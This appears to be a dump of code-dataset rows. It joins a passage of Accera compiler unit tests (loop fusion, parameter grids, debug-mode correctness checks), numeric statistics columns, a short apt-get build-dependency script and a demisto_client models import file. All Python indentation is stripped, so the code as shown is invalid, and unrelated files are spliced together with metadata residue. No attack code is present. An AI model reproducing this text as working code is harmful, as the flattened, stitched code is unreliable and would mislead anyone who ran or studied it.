C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([32, 32])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n1 = Nest([32])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0, P1 = create_parameters(2)
jj0 = s0.split(j0, P0)
fs = fuse((s0, s1), partial=1)
f, i, j, jj = fs.get_indices()
ii = fs.split(i, P1)
fs.reorder(f, i, j, ii, jj)
package = Package()
package_name = "test_fusion_parameterization_3"
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
P1: 8
}, base_name="fuse_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 32,
P1: 4,
}, base_name="fuse_2"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_4(self) -> None:
from accera import create_parameters, Nest, fuse, create_parameter_grid
A = Array(role=Array.Role.INPUT, element_type=float, shape=(128, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(128, ))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([128, 128])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n1 = Nest([128])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0, P1, P2 = create_parameters(3)
jj0 = s0.split(j0, P0)
fs = fuse((s0, s1), partial=1)
f, i, j, jj = fs.get_indices()
ii = fs.split(i, P1)
fs.reorder(i, f, j, ii, jj)
jjj = fs.split(jj, P2)
package = Package()
package_name = "test_fusion_parameterization_4"
# Expected loop structure
# P0 = 16
# P1 = 8
# P2 = 4
# for i in range(128, step=P1):
# for f in range(2):
# if f == 0:
# for j in range(128, step=P0):
# for ii in range(P1):
# for jj in range(P0, step=P2):
# for jjj in range(P2):
# ...
# if f == 1:
# for ii in range(P1):
# ...
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
P1: 8,
P2: 4
}, base_name="fuse_1"
)
# Expected loop structure
# P0 = 32
# P1 = 4
# P2 = 8
# for i in range(128, step=P1):
# for f in range(2):
# if f == 0:
# for j in range(128, step=P0):
# for ii in range(P1):
# for jj in range(P0, step=P2):
# for jjj in range(P2):
# ...
# if f == 1:
# for ii in range(P1):
# ...
package.add(
fs, args=(A, B, C), parameters={
P0: 32,
P1: 4,
P2: 8
}, base_name="fuse_2"
)
package.add(
fs,
args=(A, B, C),
parameters=create_parameter_grid({
P0: [64, 8],
P1: [12, 16, 20],
P2: [2, 10]
}),
base_name="fuse_grid"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_parameterization_auxiliary_data(self) -> None:
from accera import create_parameters, create_parameter_grid, Nest, Schedule
from hatlib import HATPackage
P0, P1, P2, P3, P4 = create_parameters(5)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
sched: Schedule = nest.create_schedule()
sched.split(j, P4)
package = Package()
package_name = "test_parameterization_auxiliary_data"
parameter_grid = {
P0: [8, 16],
P1: [16, 32],
P2: [16],
P3: [1.0, 2.0],
P4: [3, 5, 7]
}
parameters = create_parameter_grid(parameter_grid)
package.add(sched, args=(A, B, C), base_name="matmul", parameters=parameters)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
hat_package = HATPackage(pathlib.Path(TEST_PACKAGE_DIR) / f"{package_name}.hat")
functions = [fn for fn in hat_package.get_functions()]
for function in functions:
data_point = function.auxiliary['accera']['parameters']
if data_point:
self.assertIn(int(data_point["P0"]), [8, 16])
self.assertIn(int(data_point["P1"]), [16, 32])
self.assertIn(int(data_point["P2"]), [16])
self.assertIn(float(data_point["P3"]), [1.0, 2.0])
self.assertIn(int(data_point["P4"]), [3, 5, 7])
class DSLTest_10Packages(unittest.TestCase):
def _create_plan(self, target=Target.HOST) -> Function:
A = Array(role=Array.Role.INPUT_OUTPUT, shape=(64, ))
nest = Nest(shape=(64, ))
i = nest.get_indices()
@nest.iteration_logic
def _():
A[i] += 2.
plan = nest.create_plan(target)
return plan, A
def test_HAT_packages(self) -> None:
from accera import Target
pi3 = Target(Target.Model.RASPBERRY_PI_3B, category=Target.Category.CPU)
plan, A = self._create_plan(pi3)
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(
package_name,
format=Package.Format.HAT_STATIC,
mode=TEST_MODE,
output_dir=TEST_PACKAGE_DIR,
platform=Package.Platform.RASPBIAN
)
def test_MLIR_packages(self) -> None:
plan, A = self._create_plan()
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=Package.Format.MLIR_STATIC, output_dir=TEST_PACKAGE_DIR)
def test_default_output_dir(self) -> None:
plan, A = self._create_plan()
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
with verifiers.VerifyPackage(self, package_name):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE)
def test_debug_mode_1(self) -> None:
M = N = K = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, K))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(K, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest = Nest(shape=(M, N, K))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 4)
schedule.reorder(i, k, j, ii)
plan = schedule.create_plan()
plan.unroll(ii)
package = Package()
package_name = "MyDebugPackage"
function = package.add(plan, args=(A, B, C), base_name="func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, C_test + A_test @ B_test]
)
def test_debug_mode_2(self) -> None:
M = N = K = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, K))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(K, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest = Nest(shape=(M, N, K))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 4)
schedule.reorder(i, k, j, ii)
plan = schedule.create_plan()
plan.unroll(ii)
# deliberately introduce a correctness issue
plan.parallelize(indices=k)
package = Package()
package_name = "MyDebugPackageIncorrect"
function = package.add(plan, args=(A, B, C), base_name="func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
try:
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, C_test + A_test @ B_test]
)
except Exception as e:
print(e)
def test_debug_mode_fusion_1(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
schedule = fuse(schedule0, schedule1, partial=1)
f, i, j0, j1 = schedule.get_indices()
ii = schedule.split(i, 2)
schedule.reorder(i, ii, f, j0, j1)
package = Package()
package_name = "MyFusionDebugPackage"
function = package.add(schedule, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, (C_test + A_test) * B_test]
)
def test_debug_mode_fusion_2(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
# Reorder schedule1 before fusing
schedule1.reorder(j1, i1)
# Fuse schedule0 with the reordered schedule1
schedule = fuse(schedule0, schedule1)
f, a, b = schedule.get_indices()
# Deliberately break logical equivalence
# before: C[1,0] = C[1,0] * B[1,0] + A[1,0]
# after: C[1,0] = (C[1,0] + A[1,0]) * B[1,0]
schedule.reorder(a, b, f)
package = Package()
package_name = "MyFusionDebugPackageIncorrect"
function = package.add(schedule, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
try:
v.check_correctness(
function.name, before=[A_test, B_test, C_test], after=[A_test, B_test, (C_test + A_test) * B_test]
)
except Exception as e:
print(e)
def test_debug_mode_fusion_cascading_1(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
schedule_f1 = fuse(schedule0, schedule1)
f, i, j = schedule_f1.get_indices()
schedule_f1.reorder(i, j, f)
nest2 = Nest(shape=(M, N))
i2, j2 = nest2.get_indices()
@nest2.iteration_logic
def _():
C[i2, j2] -= 1.0
schedule2 = nest2.create_schedule()
# set the fused schedule first in the fusing order
schedule_f2 = fuse(schedule_f1, schedule2, partial=2)
package = Package()
package_name = "MyFusionDebugPackageCascade1"
function = package.add(schedule_f2, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name,
before=[A_test, B_test, C_test],
after=[A_test, B_test, (C_test + A_test) * B_test - 1.0]
)
def test_debug_mode_fusion_cascading_2(self) -> None:
from accera import fuse
M = N = 16
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(M, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(M, N))
nest0 = Nest(shape=(M, N))
i0, j0 = nest0.get_indices()
@nest0.iteration_logic
def _():
C[i0, j0] += A[i0, j0]
schedule0 = nest0.create_schedule()
nest1 = Nest(shape=(M, N))
i1, j1 = nest1.get_indices()
@nest1.iteration_logic
def _():
C[i1, j1] *= B[i1, j1]
schedule1 = nest1.create_schedule()
schedule_f1 = fuse(schedule0, schedule1)
f, i, j = schedule_f1.get_indices()
schedule_f1.reorder(i, j, f)
nest2 = Nest(shape=(M, N))
i2, j2 = nest2.get_indices()
@nest2.iteration_logic
def _():
C[i2, j2] -= 1.0
schedule2 = nest2.create_schedule()
# set an unfused schedule first in the fusing order
schedule_f2 = fuse(schedule2, schedule_f1, partial=2)
package = Package()
package_name = "MyFusionDebugPackageCascade2"
function = package.add(schedule_f2, args=(A, B, C), base_name="fusion_func1")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(
package_name, format=TEST_FORMAT, output_dir=output_dir, mode=Package.Mode.DEBUG, tolerance=1e-5
)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
v.check_correctness(
function.name,
before=[A_test, B_test, C_test],
after=[A_test, B_test, (C_test - 1.0 + A_test) * B_test]
)
def test_add_description(self) -> None:
from hatlib import HATFile
plan, A, = self._create_plan()
package = Package()
package_name = "MyPackage"
package.add(plan, args=(A, ), base_name="func1")
package.add(plan, args=(A, ), base_name="func2")
description1 = {
"Dependencies": ["numpy", "onnx", "scipy"],
"Documentation": "https://docs.readthedocs.io.",
"SHA": "0bb913ce84afa28127ea3fd2a9995e219dad322a"
}
package.add_description(
other=description1, version="1.0", author="Microsoft Research", license="https://mit-license.org"
)
description2 = {
"Documentation": "", # clearing a value
"SHA": None, # removing a value
"Release Notes": "https://stackoverflow.com" # adding an entry
}
package.add_description(other=description2)
package.add_description(version="2.0")
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
hat_file = HATFile.Deserialize(pathlib.Path(TEST_PACKAGE_DIR) / f"{package_name}.hat")
hat_description = hat_file.description.auxiliary
self.assertEqual(hat_description["Dependencies"], description1["Dependencies"])
self.assertEqual(hat_description["Documentation"], description2["Documentation"])
self.assertNotIn("SHA", hat_description)
self.assertEqual(hat_description["Release Notes"], description2["Release Notes"])
self.assertEqual(hat_file.description.version, "2.0")
self.assertEqual(hat_file.description.author, "Microsoft Research")
self.assertEqual(hat_file.description.license_url, "https://mit-license.org")
if __name__ == '__main__':
unittest.main(verbosity=10)
| 36.217456 | 123 | 0.564138 | 16,033 | 121,582 | 4.094305 | 0.044284 | 0.044696 | 0.033666 | 0.044147 | 0.820517 | 0.787155 | 0.756855 | 0.727576 | 0.700399 | 0.670754 | 0 | 0.036953 | 0.30845 | 121,582 | 3,356 | 124 | 36.228248 | 0.74378 | 0.092366 | 0 | 0.606926 | 0 | 0 | 0.040735 | 0.021905 | 0 | 0 | 0 | 0.000298 | 0.043723 | 1 | 0.090909 | false | 0 | 0.021212 | 0 | 0.12381 | 0.003463 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
22cfce129d38264c057ac6a8e9c8ee161f050d70 | 196 | py | Python | admin_install_tools_linux.py | Ladvien/ladvien.github.io | 53defb7ff4801f670d7fba57f2ea339c258eabbe | [
"MIT"
] | 1 | 2015-12-08T18:00:38.000Z | 2015-12-08T18:00:38.000Z | admin_install_tools_linux.py | Ladvien/ladvien.github.io | 53defb7ff4801f670d7fba57f2ea339c258eabbe | [
"MIT"
] | null | null | null | admin_install_tools_linux.py | Ladvien/ladvien.github.io | 53defb7ff4801f670d7fba57f2ea339c258eabbe | [
"MIT"
] | null | null | null | import os
os.system("sudo apt-get install build-essential checkinstall libx11-dev libxext-dev zlib1g-dev libjpeg-dev libfreetype6-dev libxml2-dev")
os.system("sudo apt-get build-dep imagemagick") | 49 | 137 | 0.811224 | 31 | 196 | 5.129032 | 0.612903 | 0.100629 | 0.150943 | 0.188679 | 0.226415 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027933 | 0.086735 | 196 | 4 | 138 | 49 | 0.860335 | 0 | 0 | 0 | 0 | 0.333333 | 0.80203 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
22d8e146781fc8a93785a980c90661e903fb7fe0 | 12,888 | py | Python | demisto_client/demisto_api/models/__init__.py | guytest/demisto-py | 8ca4f56a6177668151b5656cbe675a377003c0e9 | [
"Apache-2.0"
] | 1 | 2020-04-08T14:36:06.000Z | 2020-04-08T14:36:06.000Z | demisto_client/demisto_api/models/__init__.py | guytest/demisto-py | 8ca4f56a6177668151b5656cbe675a377003c0e9 | [
"Apache-2.0"
] | null | null | null | demisto_client/demisto_api/models/__init__.py | guytest/demisto-py | 8ca4f56a6177668151b5656cbe675a377003c0e9 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# flake8: noqa
"""
Demisto API
This is the public REST API to integrate with the demisto server. HTTP request can be sent using any HTTP-client. For an example dedicated client take a look at: https://github.com/demisto/demisto-py. Requests must include API-key that can be generated in the Demisto web client under 'Settings' -> 'Integrations' -> 'API keys' Optimistic Locking and Versioning\\: When using Demisto REST API, you will need to make sure to work on the latest version of the item (incident, entry, etc.), otherwise, you will get a DB version error (which not allow you to override a newer item). In addition, you can pass 'version\\: -1' to force data override (make sure that other users data might be lost). Assume that Alice and Bob both read the same data from Demisto server, then they both changed the data, and then both tried to write the new versions back to the server. Whose changes should be saved? Alice’s? Bob’s? To solve this, each data item in Demisto has a numeric incremental version. If Alice saved an item with version 4 and Bob trying to save the same item with version 3, Demisto will rollback Bob request and returns a DB version conflict error. Bob will need to get the latest item and work on it so Alice work will not get lost. Example request using 'curl'\\: ``` curl 'https://hostname:443/incidents/search' -H 'content-type: application/json' -H 'accept: application/json' -H 'Authorization: <API Key goes here>' --data-binary '{\"filter\":{\"query\":\"-status:closed -category:job\",\"period\":{\"by\":\"day\",\"fromValue\":7}}}' --compressed ``` # noqa: E501
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from demisto_client.demisto_api.models.advance_arg import AdvanceArg
from demisto_client.demisto_api.models.arg_atomic_filter import ArgAtomicFilter
from demisto_client.demisto_api.models.arg_filter import ArgFilter
from demisto_client.demisto_api.models.arg_transformer import ArgTransformer
from demisto_client.demisto_api.models.argument import Argument
from demisto_client.demisto_api.models.array_positions import ArrayPositions
from demisto_client.demisto_api.models.attachment import Attachment
from demisto_client.demisto_api.models.audit import Audit
from demisto_client.demisto_api.models.audit_result import AuditResult
from demisto_client.demisto_api.models.automation_script import AutomationScript
from demisto_client.demisto_api.models.automation_script_api import AutomationScriptAPI
from demisto_client.demisto_api.models.automation_script_filter import AutomationScriptFilter
from demisto_client.demisto_api.models.automation_script_filter_wrapper import AutomationScriptFilterWrapper
from demisto_client.demisto_api.models.automation_script_result import AutomationScriptResult
from demisto_client.demisto_api.models.complex_arg import ComplexArg
from demisto_client.demisto_api.models.create_incident_request import CreateIncidentRequest
from demisto_client.demisto_api.models.custom_fields import CustomFields
from demisto_client.demisto_api.models.d_bot_score import DBotScore
from demisto_client.demisto_api.models.dashboard import Dashboard
from demisto_client.demisto_api.models.data_collection_form import DataCollectionForm
from demisto_client.demisto_api.models.date_range import DateRange
from demisto_client.demisto_api.models.date_range_filter import DateRangeFilter
from demisto_client.demisto_api.models.delete_evidence import DeleteEvidence
from demisto_client.demisto_api.models.docker_image import DockerImage
from demisto_client.demisto_api.models.docker_images_result import DockerImagesResult
from demisto_client.demisto_api.models.download_entry import DownloadEntry
from demisto_client.demisto_api.models.duration import Duration
from demisto_client.demisto_api.models.ending_type import EndingType
from demisto_client.demisto_api.models.entry import Entry
from demisto_client.demisto_api.models.entry_category import EntryCategory
from demisto_client.demisto_api.models.entry_history import EntryHistory
from demisto_client.demisto_api.models.entry_reputation import EntryReputation
from demisto_client.demisto_api.models.entry_task import EntryTask
from demisto_client.demisto_api.models.entry_type import EntryType
from demisto_client.demisto_api.models.evidence import Evidence
from demisto_client.demisto_api.models.evidence_data import EvidenceData
from demisto_client.demisto_api.models.evidences import Evidences
from demisto_client.demisto_api.models.evidences_filter_wrapper import EvidencesFilterWrapper
from demisto_client.demisto_api.models.evidences_search_response import EvidencesSearchResponse
from demisto_client.demisto_api.models.field_group import FieldGroup
from demisto_client.demisto_api.models.field_mapping import FieldMapping
from demisto_client.demisto_api.models.field_term_location_map import FieldTermLocationMap
from demisto_client.demisto_api.models.file_metadata import FileMetadata
from demisto_client.demisto_api.models.filter_cache import FilterCache
from demisto_client.demisto_api.models.filter_operator_id import FilterOperatorID
from demisto_client.demisto_api.models.generic_indicator_update_batch import GenericIndicatorUpdateBatch
from demisto_client.demisto_api.models.generic_string_date_filter import GenericStringDateFilter
from demisto_client.demisto_api.models.generic_string_filter import GenericStringFilter
from demisto_client.demisto_api.models.grid_column import GridColumn
from demisto_client.demisto_api.models.group import Group
from demisto_client.demisto_api.models.groups import Groups
from demisto_client.demisto_api.models.human_cron import HumanCron
from demisto_client.demisto_api.models.important import Important
from demisto_client.demisto_api.models.incident import Incident
from demisto_client.demisto_api.models.incident_field import IncidentField
from demisto_client.demisto_api.models.incident_filter import IncidentFilter
from demisto_client.demisto_api.models.incident_search_response_wrapper import IncidentSearchResponseWrapper
from demisto_client.demisto_api.models.incident_status import IncidentStatus
from demisto_client.demisto_api.models.incident_type import IncidentType
from demisto_client.demisto_api.models.incident_wrapper import IncidentWrapper
from demisto_client.demisto_api.models.indicator_context import IndicatorContext
from demisto_client.demisto_api.models.indicator_filter import IndicatorFilter
from demisto_client.demisto_api.models.indicator_result import IndicatorResult
from demisto_client.demisto_api.models.inline_response200 import InlineResponse200
from demisto_client.demisto_api.models.insight_cache import InsightCache
from demisto_client.demisto_api.models.inv_playbook_assignee import InvPlaybookAssignee
from demisto_client.demisto_api.models.inv_playbook_due import InvPlaybookDue
from demisto_client.demisto_api.models.inv_playbook_task_complete_data import InvPlaybookTaskCompleteData
from demisto_client.demisto_api.models.inv_playbook_task_data import InvPlaybookTaskData
from demisto_client.demisto_api.models.inv_task_info import InvTaskInfo
from demisto_client.demisto_api.models.investigation import Investigation
from demisto_client.demisto_api.models.investigation_filter import InvestigationFilter
from demisto_client.demisto_api.models.investigation_playbook import InvestigationPlaybook
from demisto_client.demisto_api.models.investigation_playbook_data import InvestigationPlaybookData
from demisto_client.demisto_api.models.investigation_playbook_state import InvestigationPlaybookState
from demisto_client.demisto_api.models.investigation_playbook_task import InvestigationPlaybookTask
from demisto_client.demisto_api.models.investigation_playbook_tasks_api import InvestigationPlaybookTasksAPI
from demisto_client.demisto_api.models.investigation_search_response import InvestigationSearchResponse
from demisto_client.demisto_api.models.investigation_status import InvestigationStatus
from demisto_client.demisto_api.models.investigation_type import InvestigationType
from demisto_client.demisto_api.models.investigations import Investigations
from demisto_client.demisto_api.models.ioc_object import IocObject
from demisto_client.demisto_api.models.ioc_objects import IocObjects
from demisto_client.demisto_api.models.label import Label
from demisto_client.demisto_api.models.location import Location
from demisto_client.demisto_api.models.locations import Locations
from demisto_client.demisto_api.models.module_args import ModuleArgs
from demisto_client.demisto_api.models.new_docker_image import NewDockerImage
from demisto_client.demisto_api.models.new_docker_image_result import NewDockerImageResult
from demisto_client.demisto_api.models.notifiable_item import NotifiableItem
from demisto_client.demisto_api.models.notify_timings import NotifyTimings
from demisto_client.demisto_api.models.operator_argument import OperatorArgument
from demisto_client.demisto_api.models.order import Order
from demisto_client.demisto_api.models.output import Output
from demisto_client.demisto_api.models.output_type import OutputType
from demisto_client.demisto_api.models.period import Period
from demisto_client.demisto_api.models.playbook_input import PlaybookInput
from demisto_client.demisto_api.models.playbook_inputs import PlaybookInputs
from demisto_client.demisto_api.models.playbook_output import PlaybookOutput
from demisto_client.demisto_api.models.playbook_outputs import PlaybookOutputs
from demisto_client.demisto_api.models.playbook_view import PlaybookView
from demisto_client.demisto_api.models.question import Question
from demisto_client.demisto_api.models.raw_message import RawMessage
from demisto_client.demisto_api.models.remote_repos import RemoteRepos
from demisto_client.demisto_api.models.report import Report
from demisto_client.demisto_api.models.report_automation import ReportAutomation
from demisto_client.demisto_api.models.report_fields_decoder import ReportFieldsDecoder
from demisto_client.demisto_api.models.report_query import ReportQuery
from demisto_client.demisto_api.models.reputation_calc_alg import ReputationCalcAlg
from demisto_client.demisto_api.models.reputation_data import ReputationData
from demisto_client.demisto_api.models.run_status import RunStatus
from demisto_client.demisto_api.models.sla import SLA
from demisto_client.demisto_api.models.sla_state import SLAState
from demisto_client.demisto_api.models.script_sub_type import ScriptSubType
from demisto_client.demisto_api.models.script_target import ScriptTarget
from demisto_client.demisto_api.models.script_type import ScriptType
from demisto_client.demisto_api.models.search_incidents_data import SearchIncidentsData
from demisto_client.demisto_api.models.section import Section
from demisto_client.demisto_api.models.section_item import SectionItem
from demisto_client.demisto_api.models.severity import Severity
from demisto_client.demisto_api.models.stats_query_response import StatsQueryResponse
from demisto_client.demisto_api.models.stats_text_response import StatsTextResponse
from demisto_client.demisto_api.models.stats_trends_response import StatsTrendsResponse
from demisto_client.demisto_api.models.system import System
from demisto_client.demisto_api.models.system_agent import SystemAgent
from demisto_client.demisto_api.models.task import Task
from demisto_client.demisto_api.models.task_condition import TaskCondition
from demisto_client.demisto_api.models.task_loop import TaskLoop
from demisto_client.demisto_api.models.task_state import TaskState
from demisto_client.demisto_api.models.task_type import TaskType
from demisto_client.demisto_api.models.task_view import TaskView
from demisto_client.demisto_api.models.term_location_map import TermLocationMap
from demisto_client.demisto_api.models.terminal_options import TerminalOptions
from demisto_client.demisto_api.models.timer_action import TimerAction
from demisto_client.demisto_api.models.timer_trigger import TimerTrigger
from demisto_client.demisto_api.models.transformer_operator_id import TransformerOperatorID
from demisto_client.demisto_api.models.update_data_batch import UpdateDataBatch
from demisto_client.demisto_api.models.update_entry import UpdateEntry
from demisto_client.demisto_api.models.update_entry_tags import UpdateEntryTags
from demisto_client.demisto_api.models.update_indicator_reputation_data import UpdateIndicatorReputationData
from demisto_client.demisto_api.models.update_response import UpdateResponse
from demisto_client.demisto_api.models.uploaded_entry import UploadedEntry
from demisto_client.demisto_api.models.widget import Widget
from demisto_client.demisto_api.models.widget_cell import WidgetCell
from demisto_client.demisto_api.models.widget_cells import WidgetCells
| 79.067485 | 1,584 | 0.883923 | 1,772 | 12,888 | 6.166479 | 0.226298 | 0.133614 | 0.225588 | 0.318477 | 0.517434 | 0.517434 | 0.390592 | 0.097831 | 0.027455 | 0 | 0 | 0.00175 | 0.068746 | 12,888 | 162 | 1,585 | 79.555556 | 0.908682 | 0.134389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
